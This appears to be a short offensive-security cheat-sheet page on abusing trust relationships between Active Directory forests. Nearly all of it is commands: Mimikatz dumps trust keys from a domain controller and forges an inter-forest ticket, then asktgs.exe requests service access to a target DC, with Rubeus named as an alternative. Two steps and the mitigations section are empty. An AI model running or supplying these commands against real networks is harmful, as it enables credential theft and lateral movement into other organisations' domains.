Trust Abuse Between Forests
Using Inter-Forest Trust Tickets to Move Laterally
Step 1
Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName <dc>Step 2
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:<current_domain> /sid:<domain_SID> /rc4:<trust_key> /service:krbtgt /target:<target_forest> /ticket:C:\path\to\new\ticket.kirbi"'Step 3
# asktgs.exe
asktgs.exe <trust_ticket.kirbi> <service>/<target_domain>
# example
asktgs.exe .\trust_ticket1.kirbi CIFS/targetDC.bizcorp.localStep 4
Step 5
Steps 3 and 4 Can Also Be Done with Rubeus.exe
Mitigations
Last updated